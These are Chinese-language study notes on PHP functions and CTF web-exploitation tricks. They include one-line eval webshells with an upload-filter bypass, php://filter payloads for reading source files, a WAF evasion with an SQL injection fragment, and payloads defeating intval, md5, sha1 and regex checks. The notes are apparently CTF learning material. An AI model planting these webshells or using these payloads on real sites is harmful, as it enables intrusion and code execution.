# PHP 常见函数含义


## PHP 中文手册


https://www.php.net/manual/zh/


## isset() 检查变量是否已设置并且非null

isset — 检测变量是否已设置并且非 null


```
isset(mixed $var, mixed $... = ?): bool
```

检测变量是否设置，并且不是 null。

如果已经使用 unset() 释放了一个变量之后，它将不再是 isset()。若使用 isset() 测试一个被设置成 null 的变量，将返回 false。同时要注意的是 null 字符（"\0"）并不等同于 PHP 的 null 常量。

如果一次传入多个参数，那么 isset() 只有在全部参数都以被设置时返回 true 计算过程从左至右，中途遇到没有设置的变量时就会立即停止。


如果 var 存在并且值不是 null 则返回 true，否则返回 false。


## file_get_contents（）将整个文件读入一个字符串


```
file_get_contents(
    string $filename,
    bool $use_include_path = false,
    resource $context = ?,
    int $offset = 0,
    int $length = ?
): string|false
```


函数返回读取到的数据， 或者在失败时返回 false。




## parse_url 方法 解析 URL，返回其组成部分


参考：https://www.php.net/parse_url


例如：


```PHP
<?php
print_r(parse_url('https://username:password@hostname/path?arg=value#anchor'));
?>
```
得到

```
Array
(
    [scheme] => https
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)
```

## curl_getinfo 方法 获取一个cURL连接资源句柄的信息

参考：https://www.php.net/manual/zh/function.curl-getinfo.php

例如：

```PHP
<?php
$url = 'http://a:127.0.0.1:80@baidu.com/flag.php';
$ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch);
        print_r($result_info);
?>
```


得到

```
Array123Array
(
    [url] => http://a:127.0.0.1:80@baidu.com/flag.php
    [content_type] => text/html; charset=iso-8859-1
    [http_code] => 302
    [header_size] => 285
    [request_size] => 99
    [filetime] => -1
    [ssl_verify_result] => 0
    [redirect_count] => 0
    [total_time] => 0.069186
    [namelookup_time] => 0.011273
    [connect_time] => 0.03998
    [pretransfer_time] => 0.039981
    [size_upload] => 0
    [size_download] => 222
    [speed_download] => 3208
    [speed_upload] => 0
    [download_content_length] => 222
    [upload_content_length] => 0
    [starttransfer_time] => 0.069173
    [redirect_time] => 0
    [certinfo] => Array
        (
        )

)

```



# 一句话木马


php 格式

```php
<?php eval($_POST['a']);?>
```

phtml 格式


```phtml
<script language='php'>@eval($_POST['a']);</script>
```

phtml 绕过


```phtml
GIF89a? <script language='php'>@eval($_POST['a']);</script>
```



# PHP includ文件包含协议类型


php://filter与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。

php://filter 伪协议文件包含读取源代码，加上read=convert.base64-encode，用base64编码输出，不然会直接当做php代码执行，看不到源代码内容。

?file=php://filter/read=convert.base64-encode/resource=flag.php


### php://

php://input 伪协议 + POST发送PHP代码 （不行）


### php://input

php:// — 访问各个输入/输出流（I/O streams）


### php://output

只写的数据流

php://output允许你以 print 和 echo 一样的方式 写入到输出缓冲区。


### php://filter

重点来了，php://filter 是一种元封装器， 设计用于数据流打开时的筛选过滤应用。

我们先看看它的语法：

```
resource=<要过滤的数据流>   //这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>       //该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。
write=<写链的筛选列表>      //该参数可选。可以设定一个或多个过滤器名称，以管道符（|）分隔。
<；两个链的筛选列表>        //任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。
```

我们平时是这样利用它来读取任意文件的：

```
php://filter/read=convert.base64-encode/resource=flag.php
```

在这个payload里，convert.base64-encode就是一个过滤器,而flag.php就是要过滤的数据流，也就是要读取的文件。

转换过滤器 convert.*

convert.* 是PHP 5.0.0 添加的，作用顾名思义就是转换==

base64

convert.base64-encode和 convert.base64-decode使用这两个过滤器等同于分别用 base64_encode()和 base64_decode()函数处理所有的流数据。

字符串过滤器 string.*

这个过滤器的作用是对字符串进行各种转换。

有加密的，转换大小写的等等。


# PHP 常见文件读取方法


## php://filter


```
php://filter/read=convert.base64-encode/resource=flag.php
```

# PHP 常见文件写入方法


## 出现 file_get_contents() 函数

可以使用

```
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
```


# PHP 对查询参数的处理

我们知道PHP将查询字符串（在URL或正文中）转换为内部 `$_GET` 或的关联数组 `$_POST`。例如：`/?foo=bar` 变成 `Array([foo] => “bar”)`。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，`/?%20news[id%00=42会转换为Array([news_id] => 42)`。如果一个IDS/IPS或WAF中有一条规则是当`news_id`参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：

`/news.php?%20news[id%00=42"+AND+1=0–`

上述PHP语句的参数 `%20news[id%00` 的值将存储到 `$_GET["news_id"]` 中。

PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：

```
1.删除空白符

2.将某些字符转换为下划线（包括空格）
```

如果 `http://www.xxx.com/index.php?num = aaaa   //显示非法输入的话` 则可以再 `num` 前加一个空格 变成 `http://www.xxx.com/index.php? num = aaaa` 

这样waf就找不到num这个变量了，因为现在的变量叫“ num”，而不是“num”。但php在解析的时候，会先把空格给去掉，这样我们的代码还能正常运行，还上传了非法字符。

# 常见 PHP 绕过


## 对数字过滤

```php
include("flag.php"); 
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

//这里主要是对数字进行了过滤，并且又要GET请求传入的num变量为数字或数字串，关于preg_match()函数一个漏洞——>无法处理数组
Paylaod:?num[]=10
```


## 强比较 intval 函数


```php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
 
//强比较+intval函数
Payload:?num=4476a(任意字母)
```

## %0a 绕过


```php
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}
 
//这里有有两个条件，第一个需要是php，第二个又不可以php，不过有个差距就是m模式，/m代表匹配多行数据，这里可以通过%0a进行绕过
Payload:?cmd=%0aphp

```


## intval 函数

![img](/files/img/php/2165979-20201010194503869-1839057973.png)

```
1  Payload:?num=0x117c  十六进制2. 也可以:?num=010574    八进制//这里不能是4476，但是又要是4476，intval可以识别十六进制和八进制
    如果 base 是 0，通过检测 var 的格式来决定使用的进制：

如果字符串包括了 "0x" (或 "0X") 的前缀，使用 16 进制 (hex)；否则，
如果字符串以 "0" 开始，使用 8 进制(octal)；否则，
将使用 10 进制 (decimal）

返回值
成功时返回 var 的 integer 值，失败时返回 0。 空的 array 返回 0，非空的 array 返回 1。
最大的值取决于操作系统。 32 位系统最大带符号的 integer 范围是 -2147483648 到 2147483647。举例，在这样的系统上， intval('1000000000000') 会返回 2147483647。64 位系统上，最大带符号的 integer 值是 9223372036854775807。
字符串有可能返回 0，虽然取决于字符串最左侧的字符。
```


## 8 进制绕过

```php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
 
//ban掉了字母，但是可以用八进制绕过
Payload:?num=010574

```


## 小数绕过


```php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

//不能以0开头了，这时候可以试试小数，intval只识别整数部分
Payload:?num=4476.0001
```

## 若比较与 strpos 函数


```php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

//弱比较不可以是4476，然后是传入参数不可以存在大小写的26个字母和“.”，接着是不可以以0开头，最后结束匹配时需要4476，一开始的若比较，这里可以用010574(4476的八进制)绕过，直接到了strpos函数这里，这里不能以0开头，去看了看intval函数的发现最开头可以如果是+还是可以识别为原数
Payload:?num=+010574
```

## 路径绕过

```php
highlight_file(__FILE__); 
if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

?u=./flag.php
```


## 简单MD5碰撞


```php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?> 
//简单的md5碰撞
Payload:
POST:a[]=1&b[]=2

```

更多类型


```
弱比较

if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){
    die("success!");
}

在这样的弱比较里，0e开头的会被识别成科学计数法，结果均为0，比较时0=0为true绕过
payload：

a=QNKCDZO&b=s878926199a

常用md5加密后为0的字符串：
240610708，aabg7XSs，aabC9RqS
s878926199a

0e215962017的md5加密等于0e291242476940776845150308577824 可以用于绕过md5加密等于本身比较的弱等于。因为php比较的时候会转化为相同类型字符串再比较。则都为0.

强比较
if($_POST['a']!==$_POST['b']&& md5($_POST['a'])===md5($_POST['b'])){
    die("success!");
}

像这样的强比较，上面的方法就失效了，但是如果传入的不是字符串而是数组，不但md5()函数不会报错，结果还会返回null，在强比较里面null=null为true绕过
payload：

a[]=1&b[]=2

强碰撞
if((string)$_POST['a']!==(string)$_POST['b'] && md5($_POST['a'])===md5($_POST['b'])){
    die("success!");
}

到强碰撞这里，它用string强行转换成字符串，**经过尝试发现只要是数组进行string的话，输出的结果一定是Array**。是其他的话就会直接输出为字符串。从而限制了数组绕过这方法，只能输入字符串
先上payload：

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

这一大长串的编码，他们的md5值是相等的，原理是将hex字符串转化为ascii字符串，并写入到bin文件
考虑到要将一些不可见字符传到服务器，这里使用url编码

param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
```

## 三元运算符

```php
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
 
//考点：变量覆盖、三元运算符、&在php中的引用作用
//一开始不知道是什么意思，问了一下大师傅，他跟我说了一下三元运算符以及&的作用
//解释一下
//第一句的意思是如果存在GET请求则引用POST请求的内容
//接下来两句好像没啥用，不过为了保险，还是直接还是把flag=xx
//最关键的就是HTTP_FALG=flag，这样才就能回显flag了
//尝试了一下发现第一句存在变量覆盖的效果，所以GET请求不管给什么东西都会被POST请求覆盖掉
Payload:GET:?xxx  POST:flag=xx&HTTP_FLAG=flag

```


## array_push()函数


```php
highlight_file(__FILE__);
$allow = array();
for ($i=0; $i < 0x36d; $i++) { 
    array_push($allow, rand(0,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}
?>
//array_push()函数向allow数组的尾部添加一个元素，该元素由rand()函数返回一个随机数
//传入的参数中要有allow数组中的数字，然后是一个文件包含
//文件包含可以用php://filter伪协议，可以使用base64或者rot13，这样包含了数字
Payload:?n=php://filter/write=string%.rot13/resource=sh.php  POST:content=<?cuc flfgrz("gnp *.cuc");
```


## sha1 碰撞


```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Dat:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:27:20
*/
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}
?>
//由题可知，只需要v1的sha1的值等于v2的sha1值，即可获得flag
//百度查一下sha1碰撞
//这里是弱比较，所以作用就是sha1后为'0e'开头
Payload:
GET:?v2=aaroZmOk
POST:v1=aaK1STfY
```


类型2


```php
highlight_file(__FILE__);
include("flag.php");
 
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}
?>
 
//需要sha1碰撞Payload:
GET:?v2=aaroZmOk
POST:v1=aaK1STfY
```


## key=value 确定


```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07
*/
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛？';
$suces='既然你想要那给你吧！';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);
?>
 
//一道变量覆盖的题目，由$$key=$$value确定，意思就是$key的内容作为变量，例如：$key=xx，$$key=$xx
//GET请求的时候不能出现error，但是这里给了另外一个变量$suces，我们可以将$flag值赋给$suces
//POST请求的时候不能出现flag，但是我们第一步已经把值赋给$suces了，所以这里不用出现$flag，只需要$suces把值赋给$error
//最后再判断flag是否等于$flag，让flag!=$flag，输出$error即可
Payload:
GET:?suces=flag
POST:error=suces
```


## parse_str() 函数


```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14
*/
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
 
if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }
 
}
?>
 
//这里有个parse_str()的函数，百度了一下语法
//parse_str(string,array) 函数在string中查询字符串解析到array数组变量中
//后面的那个md5就简单了
Payload:
GET:?v3=37（任意数）
POST:v1=flag=a5bfc9e07964f8dddeb95fc584cd965d（md5转32）
```


## 字符串反转

```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:53:55
 
*/
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
 
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');
}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
?>
 
//ereg函数存在一个明显的漏洞：%00截断
//strrev反转字符串
Payload:?c=xx%00778
```